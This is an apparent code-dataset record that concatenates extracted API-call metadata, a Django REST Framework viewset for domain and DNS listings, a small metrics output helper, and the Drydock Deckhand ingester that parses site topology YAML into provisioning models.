| [((1726, 1788), 'matplotlib.patches.Ellipse', 'Ellipse', (['bpos', 'bmaj', 'bmin'], {'angle': 'bpa', 'ec': '"""k"""', 'facecolor': '"""gray"""'}), "(bpos, bmaj, bmin, angle=bpa, ec='k', facecolor='gray')\n", (1733, 1788), False, 'from matplotlib.patches import Ellipse\n'), ((2198, 2216), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['cmap'], {}), '(cmap)\n', (2210, 2216), True, 'import matplotlib.pyplot as plt\n'), ((2283, 2318), 'matplotlib.colors.ListedColormap', 'mcolors.ListedColormap', (['color_index'], {}), '(color_index)\n', (2305, 2318), True, 'import matplotlib.colors as mcolors\n'), ((5830, 5847), 'astropy.io.fits.open', 'fits.open', (['infile'], {}), '(infile)\n', (5839, 5847), False, 'from astropy.io import fits\n'), ((6405, 6419), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6417, 6419), True, 'import matplotlib.pyplot as plt\n'), ((1867, 1901), 'astropy.table.Table.read', 'Table.read', (['notefile'], {'format': '"""csv"""'}), "(notefile, format='csv')\n", (1877, 1901), False, 'from astropy.table import Table\n'), ((2222, 2243), 'numpy.arange', 'np.arange', (['N_cut', '(256)'], {}), '(N_cut, 256)\n', (2231, 2243), True, 'import numpy as np\n'), ((2403, 2432), 'matplotlib.colors.Normalize', 'mcolors.Normalize', (['vmin', 'vmax'], {}), '(vmin, vmax)\n', (2420, 2432), True, 'import matplotlib.colors as mcolors\n'), ((2570, 2605), 'matplotlib.colors.Normalize', 'mcolors.Normalize', (['vmin', 'vmax', '(True)'], {}), '(vmin, vmax, True)\n', (2587, 2605), True, 'import matplotlib.colors as mcolors\n'), ((5455, 5475), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {}), '(outfile)\n', (5466, 5475), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6281), 'numpy.min', 'np.min', (['img'], {}), '(img)\n', (6276, 6281), True, 'import numpy as np\n'), ((6283, 6294), 'numpy.max', 'np.max', (['img'], {}), '(img)\n', (6289, 6294), True, 'import numpy as np\n'), ((7457, 7661), 'getopt.getopt', 'getopt.getopt', (['argv', '"""hi:c:o:w:l:b:f:d:a:n:N:"""', "['help', 'infile=', 'cmul=', 'outfile=', 'win=', 'bpos=', 'figsize=',\n 'dpi=', 'annotatefile=', 'levs=', 'colormap=', 'N_cut=', 'norm=',\n 'fraction=']"], {}), "(argv, 'hi:c:o:w:l:b:f:d:a:n:N:', ['help', 'infile=', 'cmul=',\n 'outfile=', 'win=', 'bpos=', 'figsize=', 'dpi=', 'annotatefile=',\n 'levs=', 'colormap=', 'N_cut=', 'norm=', 'fraction='])\n", (7470, 7661), False, 'import getopt\n'), ((2530, 2560), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2538, 2560), True, 'import numpy as np\n'), ((2839, 2881), 'matplotlib.colors.PowerNorm', 'mcolors.PowerNorm', (['gamma', 'vmin', 'vmax', '(True)'], {}), '(gamma, vmin, vmax, True)\n', (2856, 2881), True, 'import matplotlib.colors as mcolors\n'), ((5555, 5584), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {'dpi': 'dpi'}), '(outfile, dpi=dpi)\n', (5566, 5584), True, 'import matplotlib.pyplot as plt\n'), ((5933, 6004), 'numpy.array', 'np.array', (['[-1, 1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096]'], {}), '([-1, 1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096])\n', (5941, 6004), True, 'import numpy as np\n'), ((7712, 7723), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (7720, 7723), False, 'import sys\n'), ((2978, 3005), 'matplotlib.colors.LogNorm', 'mcolors.LogNorm', (['vmin', 'vmax'], {}), '(vmin, vmax)\n', (2993, 3005), True, 'import matplotlib.colors as mcolors\n'), ((5627, 5656), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {'dpi': 'dpi'}), '(outfile, dpi=dpi)\n', 
(5638, 5656), True, 'import matplotlib.pyplot as plt\n'), ((2752, 2782), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2760, 2782), True, 'import numpy as np\n'), ((2938, 2968), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2946, 2968), True, 'import numpy as np\n'), ((3272, 3323), 'matplotlib.colors.SymLogNorm', 'mcolors.SymLogNorm', (['linthresh', 'linscale', 'vmin', 'vmax'], {}), '(linthresh, linscale, vmin, vmax)\n', (3290, 3323), True, 'import matplotlib.colors as mcolors\n'), ((3901, 3927), 'numpy.array', 'np.array', (['args'], {'dtype': '"""f4"""'}), "(args, dtype='f4')\n", (3909, 3927), True, 'import numpy as np\n'), ((3483, 3524), 'matplotlib.colors.TwoSlopeNorm', 'mcolors.TwoSlopeNorm', (['vcenter', 'vmin', 'vmax'], {}), '(vcenter, vmin, vmax)\n', (3503, 3524), True, 'import matplotlib.colors as mcolors\n'), ((4091, 4122), 'numpy.array', 'np.array', (['args[:-1]'], {'dtype': '"""f4"""'}), "(args[:-1], dtype='f4')\n", (4099, 4122), True, 'import numpy as np\n'), ((3143, 3173), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3151, 3173), True, 'import numpy as np\n'), ((4313, 4339), 'numpy.array', 'np.array', (['args'], {'dtype': '"""f4"""'}), "(args, dtype='f4')\n", (4321, 4339), True, 'import numpy as np\n'), ((4348, 4422), 'matplotlib.patches.Ellipse', 'Ellipse', (['(x, y)', 'majax', 'minax'], {'angle': 'pa', 'lw': '(0.5)', 'fc': '"""none"""', 'ec': '"""k"""', 'ls': '"""-"""'}), "((x, y), majax, minax, angle=pa, lw=0.5, fc='none', ec='k', ls='-')\n", (4355, 4422), False, 'from matplotlib.patches import Ellipse\n'), ((3232, 3262), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3240, 3262), True, 'import numpy as np\n'), ((3443, 3473), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3451, 3473), True, 'import numpy as np\n')] |
from rest_framework.viewsets import ModelViewSet, GenericViewSet
from rest_framework.response import Response
from api.serializers.domain import *
from api.pagination.page import MyPageNumberPagination
from api.models import *
class MDomainListViewSet(ModelViewSet):
queryset = MasterDomainName.objects.all().order_by('id')
pagination_class = MyPageNumberPagination
serializer_class = MDomainListSerializers
class DnsListViewSet(GenericViewSet):
def list(self, request, *args, **kwargs):
res = {"count": 0, 'results': None}
domain_id = request.query_params.get('domain')
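        # Illustrative request (exact URL depends on routing, which is not shown here):
        # GET /dns/?domain=3 returns one page of Dns records belonging to master domain 3.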
dns_list = Dns.objects.all().filter(master_domain_name=domain_id)
dns_count = Dns.objects.all().filter(master_domain_name=domain_id).count()
page = MyPageNumberPagination()
page_dns_list = page.paginate_queryset(dns_list,request,self)
ser = DnsListSerializers(instance=page_dns_list,many=True)
res['results'] = ser.data
res['count'] = dns_count
return Response(res)
class DnsUpdataViewSet(ModelViewSet):
queryset = Dns.objects.all().order_by('id')
serializer_class = DnsUpdataSerializers
| [
"rest_framework.response.Response",
"api.pagination.page.MyPageNumberPagination"
]
| [((779, 803), 'api.pagination.page.MyPageNumberPagination', 'MyPageNumberPagination', ([], {}), '()\n', (801, 803), False, 'from api.pagination.page import MyPageNumberPagination\n'), ((1023, 1036), 'rest_framework.response.Response', 'Response', (['res'], {}), '(res)\n', (1031, 1036), False, 'from rest_framework.response import Response\n')] |
import json
from .accuracy_tool import gen_micro_macro_result
def null_output_function(data, config, *args, **params):
return ""
def basic_output_function(data, config, *args, **params):
which = config.get("output", "output_value").replace(" ", "").split(",")
temp = gen_micro_macro_result(data)
result = {}
for name in which:
result[name] = temp[name]
return json.dumps(result, sort_keys=True)
| [
"json.dumps"
]
| [((414, 448), 'json.dumps', 'json.dumps', (['result'], {'sort_keys': '(True)'}), '(result, sort_keys=True)\n', (424, 448), False, 'import json\n')] |
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This data ingester will consume YAML site topology documents."""
import yaml
import logging
import jsonschema
import os
import pkg_resources
import copy
import hashlib
import drydock_provisioner.objects.fields as hd_fields
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
from drydock_provisioner import error as errors
from drydock_provisioner import objects
from drydock_provisioner.ingester.plugins import IngesterPlugin
cache_opts = {
'cache.type': 'memory',
'expire': 1800,
}
cache = CacheManager(**parse_cache_config_options(cache_opts))
class DeckhandIngester(IngesterPlugin):
def __init__(self):
super().__init__()
self.logger = logging.getLogger('drydock.ingester.deckhand')
self.load_schemas()
def get_name(self):
return "deckhand"
def ingest_data(self, **kwargs):
"""Parse and save design data.
:param content: String of valid Deckhand YAML
:returns: a tuple of a status response and a list of parsed objects from drydock_provisioner.objects
"""
def local_parse():
return self.parse_docs(kwargs.get('content'))
if 'content' in kwargs:
try:
# Hash the input to use as the cache key. This is not a security
# related hash, so use cheap and fast MD5
hv = hashlib.md5(kwargs.get('content', b'')).hexdigest()
local_cache = cache.get_cache('parsed_docs')
results = local_cache.get(key=hv, createfunc=local_parse)
parse_status, models = results
except Exception as ex:
self.logger.debug("Error parsing design - hash %s", hv, exc_info=ex)
raise ex
else:
raise ValueError('Missing parameter "content"')
return parse_status, models
def parse_docs(self, doc_blob):
"""Translate a YAML string into the internal Drydock model.
        Returns a tuple of an objects.Validation instance summarizing all
        document processing and a list of models yielded by successful processing
:param doc_blob: bytes representing a utf-8 encoded YAML string
"""
models = []
yaml_string = doc_blob.decode()
self.logger.debug("yamlingester:parse_docs - Parsing YAML string.")
try:
parsed_data = yaml.safe_load_all(yaml_string)
except yaml.YAMLError as err:
if hasattr(err, 'problem_mark'):
mark = err.problem_mark
raise errors.IngesterError(
"Error parsing YAML at (l:%s, c:%s): %s" %
(mark.line + 1, mark.column + 1, err))
else:
raise errors.IngesterError("Error parsing YAML: %s" % (err))
# tracking processing status to provide a complete summary of issues
ps = objects.Validation()
ps.set_status(hd_fields.ValidationResult.Success)
for d in parsed_data:
try:
(schema_ns, doc_kind, doc_version) = d.get('schema',
'').split('/')
except ValueError as ex:
self.logger.error(
"Error with document structure.", exc_info=ex)
self.logger.debug("Error document\n%s" % yaml.dump(d))
continue
if schema_ns == 'drydock':
try:
doc_ref = objects.DocumentReference(
doc_type=hd_fields.DocumentType.Deckhand,
doc_schema=d.get('schema'),
doc_name=d.get('metadata', {}).get('name', 'Unknown'))
doc_errors = self.validate_drydock_document(d)
if len(doc_errors) > 0:
for e in doc_errors:
ps.add_detail_msg(
objects.ValidationMessage(
msg="%s:%s schema validation error: %s" %
(doc_kind, doc_version, e),
name="DD001",
docs=[doc_ref],
error=True,
level=hd_fields.MessageLevels.ERROR,
diagnostic=
"Invalid input file - see Drydock Troubleshooting Guide for DD001"
))
ps.set_status(hd_fields.ActionResult.Failure)
continue
model = self.process_drydock_document(d)
model.doc_ref = doc_ref
models.append(model)
except errors.IngesterError as ie:
msg = "Error processing document: %s" % str(ie)
self.logger.warning(msg)
ps.add_detail_msg(
objects.ValidationMessage(
msg=msg,
name="DD000",
error=True,
level=hd_fields.MessageLevels.ERROR,
docs=[doc_ref],
diagnostic="Exception during document processing "
"- see Drydock Troubleshooting Guide "
"for DD000"))
ps.set_status(hd_fields.ActionResult.Failure)
except Exception as ex:
msg = "Unexpected error processing document: %s" % str(ex)
self.logger.error(msg, exc_info=True)
ps.add_detail_msg(
objects.ValidationMessage(
msg=msg,
name="DD000",
error=True,
level=hd_fields.MessageLevels.ERROR,
docs=[doc_ref],
diagnostic="Unexpected exception during document "
"processing - see Drydock Troubleshooting "
"Guide for DD000"))
ps.set_status(hd_fields.ActionResult.Failure)
return (ps, models)
def process_drydock_document(self, doc):
"""Process a parsed YAML document.
:param doc: The dictionary from parsing the YAML document
"""
(schema_ns, kind, version) = doc.get('schema', '').split('/')
if version == 'v1':
doc_processor = DeckhandIngester.v1_doc_handlers.get(kind, None)
else:
doc_processor = None
if doc_processor is None:
raise errors.IngesterError(
"Invalid document - Kind %s and Version %s" % (kind, version))
metadata = doc.get('metadata', {})
doc_name = metadata.get('name')
return doc_processor(self, doc_name, doc.get('data', {}))
def validate_drydock_document(self, doc):
"""Validate a parsed document via jsonschema.
If a schema for a document Kind is not available, the document is
considered valid. Schema is chosen by the doc['kind'] field.
        Returns an empty list for valid documents, otherwise returns a list
of all found errors
:param doc: dictionary of the parsed document.
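        For example, a document whose schema is 'drydock/Region/v1' is validated
        against the loaded 'drydock/Region/v1' schema when that schema is available.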
"""
schemaname = doc.get('schema', '')
(schema_ns, doc_kind, doc_version) = schemaname.split('/')
errors_found = []
if doc_version == 'v1':
if schemaname in self.v1_doc_schemas:
validator = jsonschema.Draft4Validator(
self.v1_doc_schemas.get(schemaname))
for error in validator.iter_errors(doc.get('data', [])):
errors_found.append(error.message)
return errors_found
def process_drydock_region(self, name, data):
"""Process the data/spec section of a Region document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Site()
# Need to add validation logic, we'll assume the input is
# valid for now
model.name = name
model.status = hd_fields.SiteStatus.Unknown
model.source = hd_fields.ModelSource.Designed
model.tag_definitions = objects.NodeTagDefinitionList()
tag_defs = data.get('tag_definitions', [])
for t in tag_defs:
tag_model = objects.NodeTagDefinition()
tag_model.tag = t.get('tag', '')
tag_model.type = t.get('definition_type', '')
tag_model.definition = t.get('definition', '')
if tag_model.type not in ['lshw_xpath']:
raise errors.IngesterError(
'Unknown definition_type in '
                    'tag_definition instance: %s' % (tag_model.type))
model.tag_definitions.append(tag_model)
auth_keys = data.get('authorized_keys', [])
model.authorized_keys = [k for k in auth_keys]
repos = data.get('repositories', None)
if repos:
model.repositories = self.process_drydock_region_repo_list(repos)
return model
def process_drydock_region_repo_list(self, data):
"""Process a package repository list.
:param data: The data from the ``repositories`` key in a Region document
"""
model = objects.RepositoryList()
for k, v in data.items():
if k == 'remove_unlisted':
model.remove_unlisted = v
else:
model.append(objects.Repository(name=k, **v))
return model
def process_drydock_rack(self, name, data):
"""Process the data/spec section of a Rack document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Rack()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.tor_switches = objects.TorSwitchList()
tors = data.get('tor_switches', {})
for k, v in tors.items():
tor = objects.TorSwitch()
tor.switch_name = k
tor.mgmt_ip = v.get('mgmt_ip', None)
tor.sdn_api_uri = v.get('sdn_api_url', None)
model.tor_switches.append(tor)
model.location = copy.deepcopy(data.get('location', {}))
model.local_networks = [n for n in data.get('local_networks', [])]
return model
def process_drydock_networklink(self, name, data):
"""Process the data/spec section of a NetworkLink document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.NetworkLink()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.metalabels = data.get('labels', {})
bonding = data.get('bonding', {})
model.bonding_mode = bonding.get(
'mode', hd_fields.NetworkLinkBondingMode.Disabled)
if model.bonding_mode in \
(hd_fields.NetworkLinkBondingMode.LACP,
hd_fields.NetworkLinkBondingMode.RoundRobin,
hd_fields.NetworkLinkBondingMode.Standby):
model.bonding_mon_rate = bonding.get('mon_rate', '100')
model.bonding_up_delay = bonding.get('up_delay', '200')
model.bonding_down_delay = bonding.get('down_delay', '200')
if model.bonding_mode == hd_fields.NetworkLinkBondingMode.LACP:
model.bonding_xmit_hash = bonding.get('hash', 'layer3+4')
model.bonding_peer_rate = bonding.get('peer_rate', 'fast')
model.mtu = data.get('mtu', None)
model.linkspeed = data.get('linkspeed', None)
trunking = data.get('trunking', {})
model.trunk_mode = trunking.get(
'mode', hd_fields.NetworkLinkTrunkingMode.Disabled)
model.native_network = trunking.get('default_network', None)
model.allowed_networks = data.get('allowed_networks', None)
return model
def process_drydock_network(self, name, data):
"""Process the data/spec section of a Network document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Network()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.metalabels = data.get('labels', {})
model.cidr = data.get('cidr', None)
model.vlan_id = data.get('vlan', None)
model.mtu = data.get('mtu', None)
model.routedomain = data.get('routedomain', None)
dns = data.get('dns', {})
model.dns_domain = dns.get('domain', 'local')
model.dns_servers = dns.get('servers', None)
ranges = data.get('ranges', [])
model.ranges = []
for r in ranges:
model.ranges.append({
'type': r.get('type', None),
'start': r.get('start', None),
'end': r.get('end', None),
})
routes = data.get('routes', [])
model.routes = []
for r in routes:
model.routes.append({
'subnet': r.get('subnet', None),
'gateway': r.get('gateway', None),
'metric': r.get('metric', None),
'routedomain': r.get('routedomain', None),
})
dhcp_relay = data.get('dhcp_relay', None)
if dhcp_relay is not None:
model.dhcp_relay_self_ip = dhcp_relay.get('self_ip', None)
model.dhcp_relay_upstream_target = dhcp_relay.get(
'upstream_target', None)
return model
def process_drydock_hwprofile(self, name, data):
"""Process the data/spec section of a HardwareProfile document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.HardwareProfile()
model.name = name
model.source = hd_fields.ModelSource.Designed
model.vendor = data.get('vendor', None)
model.generation = data.get('generation', None)
model.hw_version = data.get('hw_version', None)
model.bios_version = data.get('bios_version', None)
model.boot_mode = data.get('boot_mode', None)
model.bootstrap_protocol = data.get('bootstrap_protocol', None)
model.pxe_interface = data.get('pxe_interface', None)
model.devices = objects.HardwareDeviceAliasList()
device_aliases = data.get('device_aliases', {})
for d, v in device_aliases.items():
dev_model = objects.HardwareDeviceAlias()
dev_model.source = hd_fields.ModelSource.Designed
dev_model.alias = d
dev_model.bus_type = v.get('bus_type', None)
dev_model.dev_type = v.get('dev_type', None)
dev_model.address = v.get('address', None)
model.devices.append(dev_model)
model.cpu_sets = data.get('cpu_sets', None) or dict()
model.hugepages_confs = objects.HugepagesConfList()
for c, d in data.get('hugepages', {}).items():
conf = objects.HugepagesConf(
name=c, size=d.get('size'), count=d.get('count'))
model.hugepages_confs.append(conf)
return model
def process_drydock_hostprofile(self, name, data):
"""Process the data/spec section of a HostProfile document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.HostProfile()
model.name = name
model.source = hd_fields.ModelSource.Designed
self.process_host_common_fields(data, model)
return model
def process_drydock_bootaction(self, name, data):
"""Process the data/spec section of a BootAction document.
:param name: the document name attribute
        :param data: the dictionary of the parsed data/spec section
"""
model = objects.BootAction()
model.name = name
model.source = hd_fields.ModelSource.Designed
assets = data.get('assets')
model.asset_list = objects.BootActionAssetList()
for a in assets:
ba = self.process_bootaction_asset(a)
model.asset_list.append(ba)
node_filter = data.get('node_filter', None)
if node_filter is not None:
nfs = self.process_bootaction_nodefilter(node_filter)
model.node_filter = nfs
model.signaling = data.get('signaling', None)
return model
def process_bootaction_asset(self, asset_dict):
"""Process a dictionary representing a BootAction Data Asset.
:param asset_dict: dictionary representing the bootaction asset
"""
model = objects.BootActionAsset(**asset_dict)
return model
def process_bootaction_nodefilter(self, nf):
"""Process a dictionary representing a BootAction NodeFilter Set.
:param nf: dictionary representing the bootaction nodefilter set.
"""
model = objects.NodeFilterSet()
model.filter_set_type = nf.get('filter_set_type', None)
model.filter_set = []
for nf in nf.get('filter_set', []):
nf_model = objects.NodeFilter(**nf)
model.filter_set.append(nf_model)
return model
def process_drydock_node(self, name, data):
"""Process the data/spec section of a BaremetalNode document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.BaremetalNode()
model.name = name
model.source = hd_fields.ModelSource.Designed
self.process_host_common_fields(data, model)
node_metadata = data.get('metadata', {})
model.boot_mac = node_metadata.get('boot_mac', None)
addresses = data.get('addressing', [])
if len(addresses) == 0:
raise errors.IngesterError('BaremetalNode needs at least'
' 1 assigned address')
model.addressing = objects.IpAddressAssignmentList()
for a in addresses:
assignment = objects.IpAddressAssignment()
address = a.get('address', '')
if address == 'dhcp':
assignment.type = 'dhcp'
assignment.address = None
assignment.network = a.get('network')
model.addressing.append(assignment)
elif address != '':
assignment.type = 'static'
assignment.address = a.get('address')
assignment.network = a.get('network')
model.addressing.append(assignment)
else:
                self.logger.error("Invalid address assignment %s on Node %s" %
                                  (address, name))
return model
def process_host_common_fields(self, data, model):
"""Process fields common to the host-based documents.
Update the provided model with the values of fields common
to BaremetalNode and HostProfile documents.
:param data: dictionary from YAML parsing of the document data/spec section
:param model: instance of objects.HostProfile or objects.BaremetalNode to update
"""
model.parent_profile = data.get('host_profile', None)
model.hardware_profile = data.get('hardware_profile', None)
oob = data.get('oob', {})
model.oob_parameters = {}
for k, v in oob.items():
if k == 'type':
model.oob_type = oob.get('type', None)
else:
model.oob_parameters[k] = v
(model.storage_devices,
model.volume_groups) = self.process_node_storage(
data.get('storage', {}))
interfaces = data.get('interfaces', {})
model.interfaces = objects.HostInterfaceList()
for k, v in interfaces.items():
int_model = objects.HostInterface()
# A null value indicates this interface should be removed
# from any parent profiles
if v is None:
int_model.device_name = '!' + k
continue
int_model.device_name = k
int_model.network_link = v.get('device_link', None)
int_model.hardware_slaves = []
slaves = v.get('slaves', [])
for s in slaves:
int_model.hardware_slaves.append(s)
int_model.networks = []
networks = v.get('networks', [])
for n in networks:
int_model.networks.append(n)
if 'sriov' in v:
int_model.sriov = True
int_model.vf_count = v.get('sriov', {}).get('vf_count', 0)
int_model.trustedmode = v.get('sriov', {}).get(
'trustedmode', False)
model.interfaces.append(int_model)
platform = data.get('platform', {})
model.image = platform.get('image', None)
model.kernel = platform.get('kernel', None)
model.kernel_params = {}
for k, v in platform.get('kernel_params', {}).items():
model.kernel_params[k] = v
model.primary_network = data.get('primary_network', None)
node_metadata = data.get('metadata', {})
metadata_tags = node_metadata.get('tags', [])
model.tags = metadata_tags
owner_data = node_metadata.get('owner_data', {})
model.owner_data = {}
for k, v in owner_data.items():
model.owner_data[k] = v
model.rack = node_metadata.get('rack', None)
return model
def process_node_storage(self, storage):
"""Process the storage data for a node-based document.
Return a tuple of of two lists the first is a StorageDeviceList, the
second is a VolumeGroupList.
:param storage: dictionary of the storage section of a document
"""
phys_devs = storage.get('physical_devices', {})
storage_devices = objects.HostStorageDeviceList()
for k, v in phys_devs.items():
sd = objects.HostStorageDevice(name=k)
sd.source = hd_fields.ModelSource.Designed
if 'labels' in v:
sd.labels = v.get('labels').copy()
if 'volume_group' in v:
vg = v.get('volume_group')
sd.volume_group = vg
elif 'partitions' in v:
sd.partitions = objects.HostPartitionList()
for vv in v.get('partitions', []):
part_model = objects.HostPartition()
part_model.name = vv.get('name')
part_model.source = hd_fields.ModelSource.Designed
part_model.part_uuid = vv.get('part_uuid', None)
part_model.size = vv.get('size', None)
if 'labels' in vv:
part_model.labels = vv.get('labels').copy()
if 'volume_group' in vv:
                        part_model.volume_group = vv.get('volume_group')
elif 'filesystem' in vv:
fs_info = vv.get('filesystem', {})
part_model.mountpoint = fs_info.get('mountpoint', None)
part_model.fstype = fs_info.get('fstype', 'ext4')
part_model.mount_options = fs_info.get(
'mount_options', 'defaults')
part_model.fs_uuid = fs_info.get('fs_uuid', None)
part_model.fs_label = fs_info.get('fs_label', None)
sd.partitions.append(part_model)
storage_devices.append(sd)
volume_groups = objects.HostVolumeGroupList()
vol_groups = storage.get('volume_groups', {})
for k, v in vol_groups.items():
vg = objects.HostVolumeGroup(name=k)
vg.vg_uuid = v.get('vg_uuid', None)
vg.logical_volumes = objects.HostVolumeList()
volume_groups.append(vg)
for vv in v.get('logical_volumes', []):
lv = objects.HostVolume(name=vv.get('name'))
lv.size = vv.get('size', None)
lv.lv_uuid = vv.get('lv_uuid', None)
if 'filesystem' in vv:
fs_info = vv.get('filesystem', {})
lv.mountpoint = fs_info.get('mountpoint', None)
lv.fstype = fs_info.get('fstype', 'ext4')
lv.mount_options = fs_info.get('mount_options', 'defaults')
lv.fs_uuid = fs_info.get('fs_uuid', None)
lv.fs_label = fs_info.get('fs_label', None)
vg.logical_volumes.append(lv)
return (storage_devices, volume_groups)
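# Illustrative input shape only (not part of the original module): the field
# names below are taken from the parsing code above, while the values are
# invented. A data/spec section consumed by process_drydock_node() /
# process_node_storage() looks roughly like this YAML fragment:
#
#   addressing:
#     - network: mgmt
#       address: 172.16.1.20
#     - network: pxe
#       address: dhcp
#   storage:
#     physical_devices:
#       sda:
#         partitions:
#           - name: root
#             size: 20g
#             filesystem:
#               mountpoint: /
#               fstype: ext4
#               mount_options: defaults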
def load_schemas(self):
self.v1_doc_schemas = dict()
schema_dir = self._get_schema_dir()
for schema_file in os.listdir(schema_dir):
f = open(os.path.join(schema_dir, schema_file), 'r')
for schema in yaml.safe_load_all(f):
schema_for = schema['metadata']['name']
if schema_for in self.v1_doc_schemas:
self.logger.warning(
"Duplicate document schemas found for document kind %s."
% schema_for)
self.logger.debug(
"Loaded schema for document kind %s." % schema_for)
self.v1_doc_schemas[schema_for] = schema.get('data')
f.close()
def _get_schema_dir(self):
return pkg_resources.resource_filename('drydock_provisioner',
'schemas')
# Mapping of handlers for different document kinds
v1_doc_handlers = {
'Region': process_drydock_region,
'Rack': process_drydock_rack,
'NetworkLink': process_drydock_networklink,
'Network': process_drydock_network,
'HardwareProfile': process_drydock_hwprofile,
'HostProfile': process_drydock_hostprofile,
'BaremetalNode': process_drydock_node,
'BootAction': process_drydock_bootaction,
}
| [
"logging.getLogger",
"drydock_provisioner.objects.NodeTagDefinition",
"drydock_provisioner.objects.HostVolumeGroupList",
"drydock_provisioner.objects.HostVolumeGroup",
"drydock_provisioner.objects.ValidationMessage",
"drydock_provisioner.objects.IpAddressAssignmentList",
"drydock_provisioner.objects.BootAction",
"drydock_provisioner.objects.HardwareDeviceAlias",
"drydock_provisioner.objects.HostProfile",
"drydock_provisioner.objects.IpAddressAssignment",
"drydock_provisioner.error.IngesterError",
"os.listdir",
"drydock_provisioner.objects.Validation",
"drydock_provisioner.objects.BootActionAsset",
"drydock_provisioner.objects.HostStorageDeviceList",
"drydock_provisioner.objects.HardwareDeviceAliasList",
"drydock_provisioner.objects.BaremetalNode",
"drydock_provisioner.objects.HostVolumeList",
"drydock_provisioner.objects.HardwareProfile",
"drydock_provisioner.objects.HostStorageDevice",
"drydock_provisioner.objects.Site",
"drydock_provisioner.objects.TorSwitch",
"drydock_provisioner.objects.BootActionAssetList",
"drydock_provisioner.objects.RepositoryList",
"drydock_provisioner.objects.Network",
"drydock_provisioner.objects.HostInterfaceList",
"drydock_provisioner.objects.HostInterface",
"drydock_provisioner.objects.Repository",
"yaml.dump",
"drydock_provisioner.objects.Rack",
"drydock_provisioner.objects.TorSwitchList",
"drydock_provisioner.objects.NetworkLink",
"beaker.util.parse_cache_config_options",
"drydock_provisioner.objects.NodeFilterSet",
"drydock_provisioner.objects.HostPartitionList",
"drydock_provisioner.objects.NodeTagDefinitionList",
"yaml.safe_load_all",
"os.path.join",
"pkg_resources.resource_filename",
"drydock_provisioner.objects.NodeFilter",
"drydock_provisioner.objects.HugepagesConfList",
"drydock_provisioner.objects.HostPartition"
]
| [((1180, 1218), 'beaker.util.parse_cache_config_options', 'parse_cache_config_options', (['cache_opts'], {}), '(cache_opts)\n', (1206, 1218), False, 'from beaker.util import parse_cache_config_options\n'), ((1334, 1380), 'logging.getLogger', 'logging.getLogger', (['"""drydock.ingester.deckhand"""'], {}), "('drydock.ingester.deckhand')\n", (1351, 1380), False, 'import logging\n'), ((3530, 3550), 'drydock_provisioner.objects.Validation', 'objects.Validation', ([], {}), '()\n', (3548, 3550), False, 'from drydock_provisioner import objects\n'), ((8787, 8801), 'drydock_provisioner.objects.Site', 'objects.Site', ([], {}), '()\n', (8799, 8801), False, 'from drydock_provisioner import objects\n'), ((9058, 9089), 'drydock_provisioner.objects.NodeTagDefinitionList', 'objects.NodeTagDefinitionList', ([], {}), '()\n', (9087, 9089), False, 'from drydock_provisioner import objects\n'), ((10144, 10168), 'drydock_provisioner.objects.RepositoryList', 'objects.RepositoryList', ([], {}), '()\n', (10166, 10168), False, 'from drydock_provisioner import objects\n'), ((10636, 10650), 'drydock_provisioner.objects.Rack', 'objects.Rack', ([], {}), '()\n', (10648, 10650), False, 'from drydock_provisioner import objects\n'), ((10762, 10785), 'drydock_provisioner.objects.TorSwitchList', 'objects.TorSwitchList', ([], {}), '()\n', (10783, 10785), False, 'from drydock_provisioner import objects\n'), ((11511, 11532), 'drydock_provisioner.objects.NetworkLink', 'objects.NetworkLink', ([], {}), '()\n', (11530, 11532), False, 'from drydock_provisioner import objects\n'), ((13100, 13117), 'drydock_provisioner.objects.Network', 'objects.Network', ([], {}), '()\n', (13115, 13117), False, 'from drydock_provisioner import objects\n'), ((14760, 14785), 'drydock_provisioner.objects.HardwareProfile', 'objects.HardwareProfile', ([], {}), '()\n', (14783, 14785), False, 'from drydock_provisioner import objects\n'), ((15301, 15334), 'drydock_provisioner.objects.HardwareDeviceAliasList', 'objects.HardwareDeviceAliasList', ([], {}), '()\n', (15332, 15334), False, 'from drydock_provisioner import objects\n'), ((15894, 15921), 'drydock_provisioner.objects.HugepagesConfList', 'objects.HugepagesConfList', ([], {}), '()\n', (15919, 15921), False, 'from drydock_provisioner import objects\n'), ((16418, 16439), 'drydock_provisioner.objects.HostProfile', 